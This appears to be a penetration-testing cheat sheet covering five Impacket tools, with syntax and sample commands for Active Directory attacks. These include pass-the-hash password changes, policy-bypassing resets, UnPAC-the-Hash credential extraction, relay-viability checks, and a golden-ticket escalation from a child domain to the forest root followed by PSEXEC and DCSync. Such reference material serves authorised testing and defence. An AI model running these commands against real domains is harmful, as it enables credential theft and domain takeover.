Impacket β Miscellaneous Tools
Quick Reference
| Tool | Purpose |
|---|---|
changepasswd.py |
Change or reset passwords over SMB, RPC, Kpasswd, or LDAP |
describeTicket.py |
Parse and decrypt a Kerberos ticket, display PAC contents |
DumpNTLMInfo.py |
Grab server info from NTLM negotiation (OS, domain, hostname) |
CheckLDAPStatus.py |
Check LDAP signing and channel binding enforcement on a DC |
raiseChild.py |
Privilege escalation from child domain to forest root |
changepasswd.py
Change or reset user passwords over multiple protocols: SMB-SAMR, RPC-SAMR, Kpasswd (Kerberos), or LDAP.
Syntax:
changepasswd.py [options] <domain>/<username>[:<password>]@<target>
Common Usage:
# Change own password (user knows current password)
changepasswd.py <domain>/<username>:<password>@<target> -newpass <password>
# Force reset another user's password (privileged)
changepasswd.py <domain>/<target-username>@<target> \
-altuser <domain>/<admin-username> -altpass <password> \
-newpass <password> -reset
# Change password via NT hash (Pass-the-Hash)
changepasswd.py <domain>/<username>@<target> \
-hashes <lm-hash>:<nt-hash> -newpass <password>
# Set new password using NT hash (no cleartext)
changepasswd.py <domain>/<username>:<password>@<target> \
-newhashes :<nt-hash>
# Change via Kpasswd (Kerberos protocol)
changepasswd.py <domain>/<username>:<password>@<dc-ip> \
-protocol kpasswd -newpass <password>
# Change via LDAP
changepasswd.py <domain>/<username>:<password>@<dc-ip> \
-protocol ldap -newpass <password>
# Reset via RPC (may bypass some password policies)
changepasswd.py <domain>/<target-username>@<target> \
-altuser <admin-username> -altpass <password> \
-protocol rpc-samr -newpass <password> -reset
# Kerberos auth (ccache)
KRB5CCNAME=<ticket> changepasswd.py -k -no-pass <domain>/<username>@<target> \
-newpass <password>
Options:
- -newpass <password> β New cleartext password
- -newhashes <lm-hash>:<nt-hash> β New password as NTLM hash (NTHASH or LM:NT)
- -hashes <lm-hash>:<nt-hash> β Auth hashes for target user
- -no-pass β Don't prompt for password
- -altuser <username> β Privileged account performing the change
- -altpass <password> β Password for altuser
- -althash <nt-hash> β NT hash for altuser
- -protocol {smb-samr,rpc-samr,kpasswd,ldap} / -p β Protocol (default: smb-samr)
- -reset / -admin β Force reset (may bypass password policy)
- -k β Kerberos auth
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP (for Kerberos / kpasswd)
Notes:
- kpasswd works on port 464 directly against the KDC
- -reset is useful when forcing a password reset on a locked account
- smb-samr is the most reliable default protocol
describeTicket.py
Parse a Kerberos ccache ticket, decrypt the encrypted portion, and display the PAC (including group memberships, SIDs, and credentials).
Syntax:
describeTicket.py [options] <ticket.ccache>
Common Usage:
# Parse ticket (no decryption β shows outer structure only)
describeTicket.py <ticket>
# Decrypt ticket with service account password
describeTicket.py <ticket> -p <password> -u <username> -d <domain>
# Decrypt with NT hash (RC4)
describeTicket.py <ticket> --rc4 <nt-hash>
# Decrypt with AES key
describeTicket.py <ticket> --aes <aes256-key>
# UnPAC-the-Hash β decrypt PAC Credentials section (PKINIT AS reply key)
describeTicket.py <ticket> --asrep-key <asrep-key-hex>
Options:
- <ticket> β Path to the ccache file (positional, required)
- -p <password> / --password <password> β Service account cleartext password for decryption
- -hp <hex> / --hex-password <hex> β Hex-encoded password
- -u <user> / --user <user> β Service account username
- -d <domain> / --domain <domain> β Domain FQDN
- -s <salt> / --salt <salt> β Key derivation salt
- --rc4 <nt-hash> β NT hash (RC4 key) for decryption
- --aes <hex> β AES-128 or AES-256 key for decryption
- --asrep-key <hex> β AS reply key for decrypting PAC Credentials (UnPAC-the-Hash)
Notes:
- Without decryption keys, only the unencrypted ticket metadata is shown (realm, sname, validity)
- With decryption, reveals: groups, extra SIDs, UPN, user flags, PAC logon info
- --asrep-key enables UnPAC-the-Hash: extracts LM/NT hashes from a PKINIT-obtained ticket's PAC Credentials structure
- Service key = key of the account that owns the SPN in the ticket
DumpNTLMInfo.py
Perform NTLM negotiation against a target and extract host metadata without authenticating.
Syntax:
DumpNTLMInfo.py [options] <target>
Common Usage:
# Probe SMB port (default)
DumpNTLMInfo.py <target>
# Probe RPC endpoint mapper (port 135)
DumpNTLMInfo.py <target> -port 135 -protocol RPC
# Specific port
DumpNTLMInfo.py <target> -port 445
# Resolve via target IP
DumpNTLMInfo.py <target> -target-ip <target>
Options:
- -target-ip <target> β Target IP override
- -port <port> β Destination port
- -protocol [protocol] β SMB (default) or RPC
Output includes:
- NetBIOS hostname and domain
- DNS hostname and domain
- OS version (Windows build)
- Server timestamp
- Whether SMB signing is required
Notes:
- No credentials required β completely unauthenticated
- Useful for quick OS version fingerprinting before exploitation
- Combine with CheckLDAPStatus.py to assess relay viability
CheckLDAPStatus.py
Check LDAP signing and channel binding enforcement on a domain controller β determines relay attack viability.
Syntax:
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain>
Common Usage:
# Check LDAP signing and channel binding
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain>
# With debug output
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain> -debug
# Custom DNS timeout
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain> -timeout 10
Options:
- -dc-ip <dc-ip> β DC IP or DNS resolver (required)
- -domain <domain> β Domain name (required)
- -debug β Debug output
- -timeout <seconds> β DNS timeout
Output interpretation:
- LDAP signing: NOT required β LDAP relay attacks are viable
- LDAP signing: required β LDAP relay blocked (use LDAPS)
- Channel binding: NOT required β ntlmrelayx LDAP relay works
- Channel binding: required β LDAPS relay blocked
Notes:
- Pair with DumpNTLMInfo.py for full pre-relay assessment
- SMB signing check: use nmap --script smb2-security-mode or netexec smb
raiseChild.py
Privilege escalation from a child domain to the forest root using the trust key β Mimikatz's lsadump::trust /patch equivalent.
Syntax:
raiseChild.py [options] <domain>/<username>[:<password>]
Common Usage:
# Full attack β escalate from child domain to forest root and PSEXEC target
raiseChild.py <child-domain>/<username>:<password> \
-target-exec <dc-hostname>
# Save golden ticket without PSEXEC
raiseChild.py <child-domain>/<username>:<password> \
-w <output>
# Pass-the-Hash
raiseChild.py -hashes <lm-hash>:<nt-hash> \
<child-domain>/<username> -target-exec <dc-hostname>
# Target specific RID (default: 500 = Administrator)
raiseChild.py <child-domain>/<username>:<password> \
-target-exec <dc-hostname> -targetRID 500
Options:
- -target-exec <address> β Host to PSEXEC after escalation
- -targetRID <rid> β Target user RID to dump credentials for (default: 500)
- -w <pathname> β Save golden ticket to ccache file
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
Notes:
- Requires Domain Admin privileges in the child domain
- Exploits the SID History + inter-realm trust key to forge a golden ticket trusted by the forest root DC
- The forged ticket includes the Enterprise Admins SID (S-1-5-21-...-519)
- After escalation, perform DCSync against the forest root DC